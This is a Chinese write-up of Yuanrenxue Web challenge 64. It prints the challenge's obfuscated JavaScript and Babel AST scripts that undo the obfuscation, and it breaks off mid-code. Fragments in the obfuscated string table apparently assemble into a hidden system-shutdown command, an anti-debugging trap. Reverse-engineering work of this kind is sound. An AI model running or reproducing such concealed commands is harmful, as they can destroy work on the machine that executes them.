猿人学Web64题实战

代码混淆类似OB

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
function L() {
    var s = ["rn s", "4567", "3](v", "0])", "=e,s", "w s", "))[s", "14))", "[]),", "]())", "4])&", "hrow", "lice‍0‍g", "(-27", "onfi", "ow')", "))^s", "6,-3", "=2?s", "==1?", "(s[2", "ubti", "tle ", "[s(s", "[8]=", "gura", " -e ", "9][6", "19],", "s][v", ")]++", "try{", "1755846ttYpJU", "9])&", "ole", "(110", "itle", ",s[7", "))%s", "[0,s", "](s(", "ble‍ar", "[s(6", "])[s", "n s[", "v,x", "umen", "(-1)", ",-64", "13](", "08)]", "2])&", "2)]", "3][s", "98)]", "[255", "key‍re", "),s[", "() ", "if(v", "]=v[", "203KSndiD", ")),s", "8)]>", ")],2", ",-91", "65))", "],s.", "4VsTKgV", "(s[9", "[s(1", "(69)", "2541681RDrUCG", "ptio", "c(`o", "s(88", "s(65", "([-6", "(106", "(s(9", "95,-", "8]==", "et‍doc", "73]", ")]=[", ",-75", "0]=v", ".s[s", "DXOr", "嗨\" s", ",-5]", "`);r", ")()(", "6),s", ")));", "=s[2", "(44)", "lPGp", "is,s", "(40)", "s-1]", ")+s[", "Char", ")](s", "1))]", ".s=[", " s[!", "trac", "(82)", "9][9", "9123", "(0)]", "(2),", "n v[", "whil", "(57)", ",-35", "s[2]", "ift‍sh", "]((-", "2][s", "52).", "]),(", "2].s", "s(10", "]):s", "pQDq", "87]]", "retu", "(s(1", ":s)&", "th]:", ")],(", "0|1|", "].s[", "&(s(", "(16)", "112)", ",-83", "s(96", "],1,", ",-55", ",-40", "0),(", "!s][", "1],s", "1|5|", "80),", "loba", "=tru", "[98]", "atch", "[-54", "][17", "alue‍x‍g", "]][v", "1?s[", "5PCiGGb", ",-43", ")]()", "peof", ")],s", "erro", "n(a,", "53,-", "(s(2", "(56)", "rg2‍na", "spli", "[9][", "s(11", ",-73", "[0][", "s(50", ",-59", ")( )", "((-3", "-69,", "]+s(", "(s(3", "))}c", "9][2", "fine", "defi", "r‍e‍y‍this‍1", "],0,", "16)]", "56])", "s,8,", "])%2", "s,s(", "(62)", ",-39", "(4),", "warn", "(0),", ")]=s", "ire‍le", "oces", "&&s[", ")]=2", "2402239ZHErrs", "p‍j‍set‍r ", "8994TsYvvq", "(12)", "otyp", "(-3)", "4))", "'+v[", "s[s(", "s.s]", "&&(s", "\" wi", ",-85", "Prop", "s‍Func", "[])[", "[-58", "s[!s", "<2)&", "{try", "');r", "][1]", "[thi", "+1)%", "|s[s", "s(42", "func", "42,-", "s(41", "=[])", "116)", ",e}}", "ment", "(s(s", "s(48", "2])", "5,-4", "3]:s", ";‍argu", "(94)", "8)](", "ngth‍a", "+=s(", "=256", "&(s[", "][0]", ")&&s", " \"嗨嗨", "v[1]", "[97]", "((s[", "1])&", "ruct", "v[s(", "[(s(", "](s[", "2345", ".exe", "12),", "onst", "[v,x", ")]-1", "]);(", "44),", "this", "[2]+", "aqaX", "s(s.", "engt", "][s[", ")])v", "[3]=", "(),s", "94)]", "(s[s", ",-87", "])&&", "hutd", "[s(4", "s(80", "70)]", "s(36", "umbe", "[s(5", "7)),", "=s[s", "-38)", " not", "]=[]", "or(\"", "(s[3", "akCi", "))}", "6778", "[s(8", "rn t", "0))", "ject‍b", "prot", ").s)", ",s(1", "ents", "s(92", "09))", "(86)", "=typ", "())&", ",-76", "s'?s", ")][s", "582990KbCsFv", "e,s[", "]]:s", ",-15", "ype‍ev", ">=0;", "(2)]", ")]=1", ".s[2", "06))", "1]:s", "9][1", ",s(6", "5])&", "urn ", "=255", "1](a", ",s.s", "(s(4", "[s(2", "s[3]", "]][(", ")]=0", "2],s", "(s.s", "9))[", ",-46", "\"嗨嗨嗨", ",((s", "s(94", "48)]", "-19)", "6))[", "[s(9", "lee‍st", "2])(", "2)]=", "154LybzHd", "writ", "play", ",-72", "嗨嗨\"'", "),s.", ")())", "6)](", "cume", "[0](", "-44,", "leng", "r.ex", "chil", "2)]|", "[256", "[3])", ")s(s", "e‍i‍requ", "2|4|", "9][8", "[v[2", "[s(7", "),s(", "-h n", "~thi", "(72)", "(s(5", "(-80", "th t", "-89)", "]),s", "][s(", "[0] ", "(64)", "][49", ").s", "type", "=(fu", "):s)", "deAt‍B", "],0)", "100)", "s(16", "cons", "[-79", ");(s", "[-41", "ncti", "2))", "for(", "!s].", "&(s.", "s(44", "ll‍arg", "9)))", ",s)[", "=1?s", "21](", "8912", "[s.s", "v[2]", ")]](", "atio", "s(58", "bind", "e)&&", "&0:s", "42)]", "v>>1", "(37)", ",-66", "107)", "s[9]", "=[s[", "'dis", "fp‍lop‍t", "[0],", ")],0", "info", "-30)", "t‍from", "32bTKkOz", "47,-", "(109", "):ty", "on()", ")]||", "(48)", "b){r", "-8).", "unsh", "][22", "s)()", "[2].", "6).s", "345‍sp", "rn (", "(e){", "4]][", ",-48", "ript", "tabl", "[2][", "14)]", "(60)", "2240673DYpcZt", "43172748LhXctt", "log", "(26)", "0|3", "s(32", "[s[!", "sasc", "02)]", "tion", "())", "s(19", "s(26", "]-1]", "[-12", "s(s[", ".x('", "ific", ".s)(", "truc", ",-49", "10)]", "ring", "(41)", "s[8]", "?s[!", "r‍push‍a", "0?s[", "28)]", "unde", "=s[!", "s[s.", "s(72", "9][3", "s]((", "s(12", "3‍slic", "(50)", ")[s(", "[4]", "BWrI", "UrCH", "17))", "4)](", "(112", "of '", "trin", "%s(s", ")]=(", ")])", "+)+)", "](s.", "ind‍pr", "tion‍d", "24).", "3)))", "(74)", "][92", "uffe", "s=[s", "0]([", "+s(s", "arCo", "1234", "0][0", "(96)", "]<2)", "(36)", "sear", "-71,", "tch(", "8))?", "DFCL", ",-28", "oStr", "=s(s", "3])&", "))<s", "21,-", "}ret", "9,-5", "0)]=", "0:s[", "ADNw", "own ", "[2])", "-2).", "])()", "s(s(", "ctio", "--){", "(8)]", "93))", "][10", "toSt", "[1,s", "g5‍!do", "3]=[", "s][s", "s.s=", "7],s", "2)](", "tor‍Ob", "(98)", "(((.", ")}ca", "3))]", "45‍map", "rgum", "eizc", "7]),", "(58)", ",s(3", "&s[3", "=fun", "ypeo", "etur", "-29)", "s]=s", "= gl", "=s?s", "tor", " v==", "](),", "s[0]", "[s[4", ".s[1", "s[1]", "[-97", "41))", "[-16", "oper", "]||s", "able", "SzbS", "xGiR", ")][0", "0[1]", "0][s", "((-8", ";s(s", "n \"哎", "]++)", "e){s", "9))<", "))&&", "3]),", "s[7]", "4))[", "0,1[", "thro", "]=s[", ",-26", "nt.a", "0)](", "+)+$", "(4)]", "],s[", "c('s", "s.s[", "obal", "[!s]", "=s[9", "),s)", "(100", "57).", "g‍loca", "12)]", "-37,", "=[th"];
    L = function () {
        return s;
    };
    return L();
}

!(function (a, p) {
    var g = {
            a: 619,
            p: 759,
            T: 364,
            y: 630,
            D: 869,
            G: 906,
            K: 389
        },
        X = l,
        T = a();
    while (!![]) {
        try {
            var y = parseInt(X(g.a)) / 1 * (-parseInt(X(761)) / 2) + parseInt(X(388)) / 3 * (-parseInt(X(626)) / 4) + -parseInt(X(715)) / 5 * (-parseInt(X(590)) / 6) + parseInt(X(g.p)) / 7 + parseInt(X(g.T)) / 8 * (-parseInt(X(g.y)) / 9) + -parseInt(X(g.D)) / 10 * (parseInt(X(g.G)) / 11) + parseInt(X(g.K)) / 12;
            if (y === p) break;else T['push'](T['shift']());
        } catch (D) {
            T['push'](T['shift']());
        }
    }
})(L, 627943);

console.log(JSON.stringify(L()))

function l(J, z) {
    var F = L();
    return l = function (r, a) {
        r = r - 292;
        var p = F[r];
        return p;
    }, l(J, z);
}

w = l

console.log(w(0x2e5))

使用AST 简单的解下混淆

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
function L() {
    var s = ["rn s", "4567", "3](v", "0])", "=e,s", "w s", "))[s", "14))", "[]),", "]())", "4])&", "hrow", "lice‍0‍g", "(-27", "onfi", "ow')", "))^s", "6,-3", "=2?s", "==1?", "(s[2", "ubti", "tle ", "[s(s", "[8]=", "gura", " -e ", "9][6", "19],", "s][v", ")]++", "try{", "1755846ttYpJU", "9])&", "ole", "(110", "itle", ",s[7", "))%s", "[0,s", "](s(", "ble‍ar", "[s(6", "])[s", "n s[", "v,x", "umen", "(-1)", ",-64", "13](", "08)]", "2])&", "2)]", "3][s", "98)]", "[255", "key‍re", "),s[", "() ", "if(v", "]=v[", "203KSndiD", ")),s", "8)]>", ")],2", ",-91", "65))", "],s.", "4VsTKgV", "(s[9", "[s(1", "(69)", "2541681RDrUCG", "ptio", "c(`o", "s(88", "s(65", "([-6", "(106", "(s(9", "95,-", "8]==", "et‍doc", "73]", ")]=[", ",-75", "0]=v", ".s[s", "DXOr", "嗨\" s", ",-5]", "`);r", ")()(", "6),s", ")));", "=s[2", "(44)", "lPGp", "is,s", "(40)", "s-1]", ")+s[", "Char", ")](s", "1))]", ".s=[", " s[!", "trac", "(82)", "9][9", "9123", "(0)]", "(2),", "n v[", "whil", "(57)", ",-35", "s[2]", "ift‍sh", "]((-", "2][s", "52).", "]),(", "2].s", "s(10", "]):s", "pQDq", "87]]", "retu", "(s(1", ":s)&", "th]:", ")],(", "0|1|", "].s[", "&(s(", "(16)", "112)", ",-83", "s(96", "],1,", ",-55", ",-40", "0),(", "!s][", "1],s", "1|5|", "80),", "loba", "=tru", "[98]", "atch", "[-54", "][17", "alue‍x‍g", "]][v", "1?s[", "5PCiGGb", ",-43", ")]()", "peof", ")],s", "erro", "n(a,", "53,-", "(s(2", "(56)", "rg2‍na", "spli", "[9][", "s(11", ",-73", "[0][", "s(50", ",-59", ")( )", "((-3", "-69,", "]+s(", "(s(3", "))}c", "9][2", "fine", "defi", "r‍e‍y‍this‍1", "],0,", "16)]", "56])", "s,8,", "])%2", "s,s(", "(62)", ",-39", "(4),", "warn", "(0),", ")]=s", "ire‍le", "oces", "&&s[", ")]=2", "2402239ZHErrs", "p‍j‍set‍r ", "8994TsYvvq", "(12)", "otyp", "(-3)", "4))", "'+v[", "s[s(", "s.s]", "&&(s", "\" wi", ",-85", "Prop", "s‍Func", "[])[", "[-58", "s[!s", "<2)&", "{try", "');r", "][1]", "[thi", "+1)%", "|s[s", "s(42", "func", "42,-", "s(41", "=[])", "116)", ",e}}", "ment", "(s(s", "s(48", "2])", "5,-4", "3]:s", ";‍argu", "(94)", "8)](", "ngth‍a", "+=s(", "=256", "&(s[", "][0]", ")&&s", " \"嗨嗨", "v[1]", "[97]", "((s[", "1])&", "ruct", "v[s(", "[(s(", "](s[", "2345", ".exe", "12),", "onst", "[v,x", ")]-1", "]);(", "44),", "this", "[2]+", "aqaX", "s(s.", "engt", "][s[", ")])v", "[3]=", "(),s", "94)]", "(s[s", ",-87", "])&&", "hutd", "[s(4", "s(80", "70)]", "s(36", "umbe", "[s(5", "7)),", "=s[s", "-38)", " not", "]=[]", "or(\"", "(s[3", "akCi", "))}", "6778", "[s(8", "rn t", "0))", "ject‍b", "prot", ").s)", ",s(1", "ents", "s(92", "09))", "(86)", "=typ", "())&", ",-76", "s'?s", ")][s", "582990KbCsFv", "e,s[", "]]:s", ",-15", "ype‍ev", ">=0;", "(2)]", ")]=1", ".s[2", "06))", "1]:s", "9][1", ",s(6", "5])&", "urn ", "=255", "1](a", ",s.s", "(s(4", "[s(2", "s[3]", "]][(", ")]=0", "2],s", "(s.s", "9))[", ",-46", "\"嗨嗨嗨", ",((s", "s(94", "48)]", "-19)", "6))[", "[s(9", "lee‍st", "2])(", "2)]=", "154LybzHd", "writ", "play", ",-72", "嗨嗨\"'", "),s.", ")())", "6)](", "cume", "[0](", "-44,", "leng", "r.ex", "chil", "2)]|", "[256", "[3])", ")s(s", "e‍i‍requ", "2|4|", "9][8", "[v[2", "[s(7", "),s(", "-h n", "~thi", "(72)", "(s(5", "(-80", "th t", "-89)", "]),s", "][s(", "[0] ", "(64)", "][49", ").s", "type", "=(fu", "):s)", "deAt‍B", "],0)", "100)", "s(16", "cons", "[-79", ");(s", "[-41", "ncti", "2))", "for(", "!s].", "&(s.", "s(44", "ll‍arg", "9)))", ",s)[", "=1?s", "21](", "8912", "[s.s", "v[2]", ")]](", "atio", "s(58", "bind", "e)&&", "&0:s", "42)]", "v>>1", "(37)", ",-66", "107)", "s[9]", "=[s[", "'dis", "fp‍lop‍t", "[0],", ")],0", "info", "-30)", "t‍from", "32bTKkOz", "47,-", "(109", "):ty", "on()", ")]||", "(48)", "b){r", "-8).", "unsh", "][22", "s)()", "[2].", "6).s", "345‍sp", "rn (", "(e){", "4]][", ",-48", "ript", "tabl", "[2][", "14)]", "(60)", "2240673DYpcZt", "43172748LhXctt", "log", "(26)", "0|3", "s(32", "[s[!", "sasc", "02)]", "tion", "())", "s(19", "s(26", "]-1]", "[-12", "s(s[", ".x('", "ific", ".s)(", "truc", ",-49", "10)]", "ring", "(41)", "s[8]", "?s[!", "r‍push‍a", "0?s[", "28)]", "unde", "=s[!", "s[s.", "s(72", "9][3", "s]((", "s(12", "3‍slic", "(50)", ")[s(", "[4]", "BWrI", "UrCH", "17))", "4)](", "(112", "of '", "trin", "%s(s", ")]=(", ")])", "+)+)", "](s.", "ind‍pr", "tion‍d", "24).", "3)))", "(74)", "][92", "uffe", "s=[s", "0]([", "+s(s", "arCo", "1234", "0][0", "(96)", "]<2)", "(36)", "sear", "-71,", "tch(", "8))?", "DFCL", ",-28", "oStr", "=s(s", "3])&", "))<s", "21,-", "}ret", "9,-5", "0)]=", "0:s[", "ADNw", "own ", "[2])", "-2).", "])()", "s(s(", "ctio", "--){", "(8)]", "93))", "][10", "toSt", "[1,s", "g5‍!do", "3]=[", "s][s", "s.s=", "7],s", "2)](", "tor‍Ob", "(98)", "(((.", ")}ca", "3))]", "45‍map", "rgum", "eizc", "7]),", "(58)", ",s(3", "&s[3", "=fun", "ypeo", "etur", "-29)", "s]=s", "= gl", "=s?s", "tor", " v==", "](),", "s[0]", "[s[4", ".s[1", "s[1]", "[-97", "41))", "[-16", "oper", "]||s", "able", "SzbS", "xGiR", ")][0", "0[1]", "0][s", "((-8", ";s(s", "n \"哎", "]++)", "e){s", "9))<", "))&&", "3]),", "s[7]", "4))[", "0,1[", "thro", "]=s[", ",-26", "nt.a", "0)](", "+)+$", "(4)]", "],s[", "c('s", "s.s[", "obal", "[!s]", "=s[9", "),s)", "(100", "57).", "g‍loca", "12)]", "-37,", "=[th"];
    L = function () {
        return s;
    };
    return L();
}

!(function (a, p) {
    var g = {
            a: 619,
            p: 759,
            T: 364,
            y: 630,
            D: 869,
            G: 906,
            K: 389
        },
        X = l,
        T = a();
    while (!![]) {
        try {
            var y = parseInt(X(g.a)) / 1 * (-parseInt(X(761)) / 2) + parseInt(X(388)) / 3 * (-parseInt(X(626)) / 4) + -parseInt(X(715)) / 5 * (-parseInt(X(590)) / 6) + parseInt(X(g.p)) / 7 + parseInt(X(g.T)) / 8 * (-parseInt(X(g.y)) / 9) + -parseInt(X(g.D)) / 10 * (parseInt(X(g.G)) / 11) + parseInt(X(g.K)) / 12;
            if (y === p) break; else T['push'](T['shift']());
        } catch (D) {
            T['push'](T['shift']());
        }
    }
})(L, 627943);


function l(J, z) {
    var F = L();
    return l = function (r, a) {
        r = r - 292;
        var p = F[r];
        return p;
    }, l(J, z);
}


const visitor = {
    "VariableDeclarator|FunctionDeclaration"(path) {//在setTimeout函数或者eval函数里无法检测是否被引用,所以慎用。
        let {node, scope} = path;
        let binding = scope.getBinding(node.id.name);
        if (binding && !binding.scope.references && binding.constant) {//没有被引用,也没有被改变
            path.remove();
        }
    },
}

traverse(ast, visitor);


const simplifyLiteral = {
    NumericLiteral({node}) {
        if (node.extra && /^0[obx]/i.test(node.extra.raw)) {
            node.extra = undefined;
        }
    },
    StringLiteral({node}) {
        if (node.extra && /\\[ux]/gi.test(node.extra.raw)) {
            node.extra = undefined;
        }
    },
}


traverse(ast, simplifyLiteral);


const SimPlus = {
    BinaryExpression(path) {
        let result = path.evaluate();
        if (result.confident) {
            path.replaceWith(types.valueToNode(result.value));
        }
    }
}


traverse(ast, SimPlus);


g = {
    a: 619,
    p: 759,
    T: 364,
    y: 630,
    D: 869,
    G: 906,
    K: 389
}
x = {
    a: 482,
    p: 410,
    T: 543,
    y: 509,
    D: 438
}
u = {
    a: 460,
    p: 361,
    T: 384,
    y: 825,
    D: 429,
    G: 428,
    K: 785,
    m: 616,
    R: 684,
    Q: 522,
    M: 704,
    f: 301,
    k: 392,
    B: 850,
    H: 497,
    A: 460,
    v: 655,
    t: 522,
    s: 347,
    S: 326,
    n: 482,
    Y: 410,
    P: 592,
    I: 326,
    J0: 592
},
    O = {
        a: 646,
        p: 523,
        T: 811,
        y: 848,
        D: 733
    }

const ReplaceString = {
    MemberExpression(path) {
        let source = path.toString();
        if (source.length === 3 || source === 'u.J0' ) {
            try {
                path.replaceWith(types.valueToNode(eval(source)));

            } catch (e) {
                console.log(e)
            }
        }
    }
}


traverse(ast, ReplaceString);

functionList = ['w', 'W', 'V', 'i', 'j']

const CallToString = {
    CallExpression(path) {
        let {node} = path;
        if (functionList.includes(node.callee.name)) {
            if (path.node.arguments.length === 1 && path.node.arguments[0].type === "NumericLiteral") {
                let args = path.node.arguments[0].value;
                try {
                    path.replaceWith(types.valueToNode(eval('l(args)')));

                } catch (e) {
                    console.log(e)
                }
            }
        }
    }
}

traverse(ast, CallToString);

为了图省事,我这里直接把解码函数复制过来

看下代码,这一段才是真正的解密函数,其他的都不太重要

1
2
x = typeof require !== "unde" + "fine" + "d" ? require : window, (s = Object["defi" + "nePr" + "oper" + "ty"])(s((Function("retu" + "rn s" + "=fun" + "ctio" + "n(a," + "b){r" + "etur" + "n s[" + "9][6" + "1](a" + ",b)}")()["s"] = Function) && s, !s, ((s[3] = [typeof window !== "unde" + "fine" + "d" ? window : global])["value"] = s[3]) && (s[3]["writ" + "able"] = !![]) && (s[3][0]["this"] = s[3][0]) && s[3]), s[4], ((s[9] = [s["s"]("s(s." + "s=[[" + "],s(" + "112)" + "],s." + "s=[s" + "(s(4" + "7))," + "s(96" + ")],s" + ".s=[" + "s(16" + ")],s" + ".s=[" + "s(88" + "),s(" + "2)])"), s["s"]("try{" + "s(s[" + "2].s" + "[0](" + "[-79" + ",-15" + ",-87" + "]),s" + "[2]." + "s[1]" + "(s[2" + "].s[" + "2])(" + "))}c" + "atch" + "(e){" + "s(s." + "s[s(" + "70)]" + "=e,s" + "[s.s" + "]((-" + "57)." + "s)()" + ")}"), s["s"]("s(s(" + "17))" + "(s(1" + "0))"), s["s"](''), s["s"]("s"), s["s"]("(s(s" + "(44)" + ",s)[" + "s(44" + ")]=(" + "s(s(" + "41))" + "+1)%" + "s(s(" + "107)" + "))"), s["s"]("retu" + "rn s"), s["s"]("(s(s" + "(109" + "))[s" + "(s(4" + "1))]" + "=s(s" + "(41)" + "))"), s["s"]("s[s." + "s]((" + "-70)" + ".s)(" + ")"), s["s"]("try{" + "s(s[" + "2].s" + "[0](" + "[-41" + ",-48" + ",-40" + "]),s" + "[2]." + "s[1]" + "(s[2" + "].s[" + "2])(" + "))}c" + "atch" + "(e){" + "s(s." + "s[s(" + "70)]" + "=e,s" + "[s.s" + "]((-" + "100)" + ".s)(" + "))}"), s["s"]("retu" + "rn s" + "[s(1" + "12)]" + "[s(4" + "8)]>" + "1?s[" + "9][8" + "3]:s" + "[9][" + "73]"), s["s"]("s(s." + "s=[s" + "(4)]" + ")"), s["s"]("v", "0[1]" + "=s[7" + "][s(" + "112)" + "][1]" + "(s(s" + "(106" + "))[s" + "(6)]" + "[s(5" + "6)](" + "v[s(" + "112)" + "],0)" + ")"), s["s"]("s", "thro" + "w s"), s["s"]("s.s=" + "[1,s" + "(40)" + "]"), s["s"]("s(s." + "s=[s" + "(0)]" + ")"), s["s"]("s(s[" + "s(26" + ")]=s" + "(s(5" + "4))[" + "s(32" + ")],s" + "[s(2" + "6)](" + "s[!s" + "][0]" + ",s(3" + "0),(" + "(s[3" + "]=[]" + ")[s(" + "34)]" + "=tru" + "e)&&" + "(s[3" + "][s(" + "14)]" + "=s[9" + "][49" + "])&&" + "s[3]" + "),s[" + "s(26" + ")](s" + ",s(3" + "0),(" + "(s[3" + "]=[]" + ")[s(" + "14)]" + "=s[9" + "][92" + "])&&" + "s[3]" + "),s[" + "s(26" + ")](s" + ",s(1" + "12)," + "((s[" + "3]=[" + "])[s" + "(82)" + "]=s[" + "9][8" + "9])&" + "&(s[" + "3][s" + "(98)" + "]=s[" + "9][6" + "2])&" + "&s[3" + "]),s" + "[s(2" + "6)](" + "s,s(" + "80)," + "((s[" + "3]=[" + "])[s" + "(82)" + "]=s[" + "9][6" + "])&&" + "s[3]" + "),s[" + "s(26" + ")](s" + ",s[s" + "(112" + ")],(" + "(s[3" + "]=[]" + ")[s(" + "82)]" + "=s[9" + "][10" + "])&&" + "(s[3" + "][s(" + "98)]" + "=s[9" + "][22" + "])&&" + "s[3]" + "),s[" + "2]=[" + "],s[" + "2][s" + "(112" + ")]=s" + "[9][" + "3][s" + "(112" + ")],s" + "[2][" + "s(11" + "2)]|" + "|s[s" + "(26)" + "](s(" + "s(10" + "4))[" + "s(58" + ")],s" + "(112" + "),((" + "s[3]" + "=[])" + "[s(8" + "2)]=" + "s[9]" + "[97]" + ")&&s" + "[3])" + ",s[7" + "]=[]" + ",s[2" + "][s(" + "112)" + "]||s" + "[s(2" + "6)](" + "s(s(" + "106)" + ")[s(" + "58)]" + ",s(1" + "12)," + "((s[" + "3]=[" + "])[s" + "(82)" + "]=s[" + "9][9" + "1])&" + "&s[3" + "]),s" + "[2][" + "s(11" + "2)]|" + "|s[s" + "(26)" + "](s(" + "s(10" + "6))[" + "s(58" + ")],0" + ",((s" + "[3]=" + "[])[" + "s(14" + ")]=[" + "])&&" + "s[3]" + "),s[" + "2][s" + "(112" + ")]||" + "s[s(" + "26)]" + "(s(s" + "(106" + "))[s" + "(58)" + "],1," + "((s[" + "3]=[" + "])[s" + "(98)" + "]=s[" + "9][9" + "3])&" + "&s[3" + "]),s" + "[2][" + "s(11" + "2)]|" + "|s[s" + "(26)" + "](s(" + "s(10" + "6))[" + "s(58" + ")],2" + ",((s" + "[3]=" + "[])[" + "s(82" + ")]=s" + "[9][" + "95])" + "&&s[" + "3])," + "s[2]" + "[s(1" + "12)]" + "=[s[" + "9][3" + "2],s" + "[9][" + "19]," + "s[9]" + "[98]" + "][s(" + "116)" + "](s[" + "9][1" + "7])," + "s[7]" + "[s(1" + "12)]" + "=[s[" + "9][6" + "7],s" + "[9][" + "87]]" + "[s(1" + "16)]" + "(s[9" + "][17" + "]),s" + "[s(2" + "6)](" + "s,8," + "((s[" + "3]=[" + "])[s" + "(82)" + "]=s[" + "9][2" + "4])&" + "&(s[" + "3][s" + "(98)" + "]=s[" + "9][8" + "5])&" + "&s[3" + "]),(" + "(-27" + ").s)" + "())"), s["s"]("v", "retu" + "rn s" + "(s(1" + "06))" + "[s(6" + ")][s" + "(56)" + "](v," + "0)"), s["s"]("try{" + "s(s[" + "2].s" + "[0](" + "[-56" + ",-72" + ",-85" + "]),s" + "[2]." + "s[1]" + "(s[2" + "].s[" + "2])(" + "))}c" + "atch" + "(e){" + "s(s." + "s[s(" + "70)]" + "=e,s" + "[s.s" + "]((-" + "52)." + "s)()" + ")}"), s["s"]("v", "retu" + "rn s" + "(s(1" + "06))" + "[s(6" + ")][s" + "(56)" + "](v," + "0,1[" + "2])"), s["s"]("s[s." + "s]((" + "-10)" + ".s)(" + ")"), s["s"]("v", "for(" + "v[2]" + "=s[!" + "s].l" + "engt" + "h-1;" + "v[2]" + ">=0;" + "v[2]" + "--){" + "if(v" + "[0] " + "in s" + "[!s]" + "[v[2" + "]])r" + "etur" + "n v[" + "1]==" + "=s?s" + "[!s]" + "[v[2" + "]]:s" + "[!s]" + "[v[2" + "]][v" + "[0]]" + "}ret" + "urn " + "v[1]" + "===s" + "?s[!" + "s][v" + "[2]+" + "1]:s" + "[9][" + "13](" + "'[s]" + "'+v[" + "0])"), s["s"]("v", "s[!s" + "]=v"), s["s"]("(s(s" + "(50)" + ",s)[" + "s(50" + ")]=0" + ")"), s["s"]("retu" + "rn s" + "[s(1" + "12)]" + "[0][" + "0][0" + "]"), s["s"]("s(s(" + "17))" + "(s(5" + "2))"), s["s"]("s(s." + "s[s(" + "28)]" + "=s[s" + ".s](" + "(-80" + ").s)" + "())"), s["s"]("s(s(" + "17))" + "(s(s" + "(57)" + "))"), s["s"]("for(" + "s(s." + "s[0]" + "[s(9" + "0)](" + "[])," + "s.s=" + "[0,s" + "(72)" + "]);(" + "s[8]" + "==1?" + "s(s." + "s[0]" + "[s(9" + "2)](" + "),s." + "s[s(" + "94)]" + "())&" + "&0:s" + "[8]=" + "=2?s" + "(s.s" + "[0][" + "0][s" + "(94)" + "]()," + "s.s[" + "s(94" + ")]()" + "):s)" + "&&(s" + ".s[s" + "(48)" + "]<2)" + "&&(s" + "(s(6" + "9))<" + "s(s(" + "65))" + "[s(4" + "8)])" + ";s(s" + "(72)" + ",s)[" + "s(72" + ")]++" + ")s(s" + "[2]." + "s[0]" + "([-6" + ",-82" + ",-46" + ",-32" + ",-75" + ",-39" + "]),s" + "[2]." + "s[1]" + "(s[2" + "].s[" + "2])(" + "))"), s["s"]("try{" + "s(s[" + "2].s" + "[0](" + "[-58" + ",-61" + ",-43" + ",-5]" + "),s[" + "2].s" + "[1](" + "s[2]" + ".s[2" + "])()" + ")}ca" + "tch(" + "e){s" + "(s.s" + "[s(7" + "0)]=" + "e,s[" + "s.s]" + "((-8" + "1).s" + ")())" + "}"), s["s"]("try{" + "s(s[" + "2].s" + "[0](" + "[-97" + ",-73" + ",-26" + "]),s" + "[2]." + "s[1]" + "(s[2" + "].s[" + "2])(" + "))}c" + "atch" + "(e){" + "s(s." + "s[s(" + "70)]" + "=e,s" + "[s.s" + "]((-" + "60)." + "s)()" + ")}"), s["s"]("(s(s" + "(109" + "))[s" + "(s(4" + "1))]" + "=s(s" + "(109" + "))[s" + "(s(9" + "3))]" + ")"), s["s"]("v", "v[s(" + "116)" + "](s[" + "9][1" + "2])"), s["s"]("v", "retu" + "rn v" + "&1?s" + "[s[4" + "]][(" + "v>>1" + ")+s[" + "!s]." + "leng" + "th]:" + "s[s[" + "4]][" + "v>>1" + "]"), s["s"]("s.s=" + "[256" + ",s(1" + "10)]"), s["s"]("(s(s" + "(4)," + "s)[s" + "(4)]" + "=256" + ")"), s["s"]("s(s." + "s=[s" + "(112" + ")],s" + ".s=[" + "s(96" + ")],s" + ".s=[" + "s(16" + ")],s" + ".s=[" + "s(2)" + "],s." + "s=[s" + "(44)" + "],s." + "s=[s" + "(96)" + "])"), s["s"]("try{" + "s(s[" + "2].s" + "[0](" + "[-12" + ",-55" + ",-3]" + "),s[" + "2].s" + "[1](" + "s[2]" + ".s[2" + "])()" + ")}ca" + "tch(" + "e){s" + "(s.s" + "[s(7" + "0)]=" + "e,s[" + "s.s]" + "((-3" + "6).s" + ")())" + "}"), s["s"]("(s(s" + "(2)," + "s)[s" + "(2)]" + "+=s(" + "s(19" + "))[s" + "(86)" + "](s(" + "s(65" + "))[s" + "(8)]" + "(s(s" + "(69)" + "))^s" + "(s(1" + "09))" + "[(s(" + "s(10" + "9))[" + "s(s(" + "41))" + "]+s(" + "s(10" + "9))[" + "s(s(" + "93))" + "])%2" + "56])" + ")"), s["s"]("s(s(" + "17))" + "(s(2" + "4))"), s["s"]("s(s." + "s=[s" + "(62)" + "])"), s["s"]("s[s." + "s]((" + "-67)" + ".s)(" + ")"), s["s"]("s(s(" + "17))" + "(s(3" + "8))?" + "s(s[" + "2].s" + "[0](" + "[-58" + ",-35" + "]),s" + "[2]." + "s[1]" + "(s[2" + "].s[" + "2])(" + ")):s" + "[4]"), s["s"]("s[s." + "s]((" + "-38)" + ".s)(" + ")"), s["s"]("(s(s" + "(0)," + "s)[s" + "(0)]" + "=s(1" + "14))"), s["s"]("(s(s" + "(16)" + ",s)[" + "s(16" + ")]=s" + "(s(1" + "09))" + "[s(s" + "(41)" + ")])"), s["s"]("s[s." + "s]((" + "-31)" + ".s)(" + ")"), s["s"]("s.s=" + "[256" + ",s(6" + "2)]"), s["s"]("s.s=" + "[0,s" + "(96)" + "]"), s["s"]("retu" + "rn s" + "(64)"), s["s"]("s[s." + "s]((" + "-30)" + ".s)(" + ")"), s["s"]("(s(s" + "(36)" + ",s)[" + "s(36" + ")]=1" + ")"), s["s"]("s[s." + "s]((" + "-77)" + ".s)(" + ")"), s["s"]("s(s." + "s=[s" + "(50)" + "])"), s["s"]("s.s=" + "[255" + ",s(4" + ")]"), s["s"]("s(s." + "s=[s" + "(36)" + "])"), s["s"]("(s(s" + "(40)" + ",s)[" + "s(40" + ")]=0" + ")"), s["s"]("s(s." + "s=[s" + "(110" + ")])"), s["s"]("(s(s" + "(60)" + ",s)[" + "s(60" + ")]=s" + "(100" + "))"), s["s"]("(s(s" + "(12)" + ",s)[" + 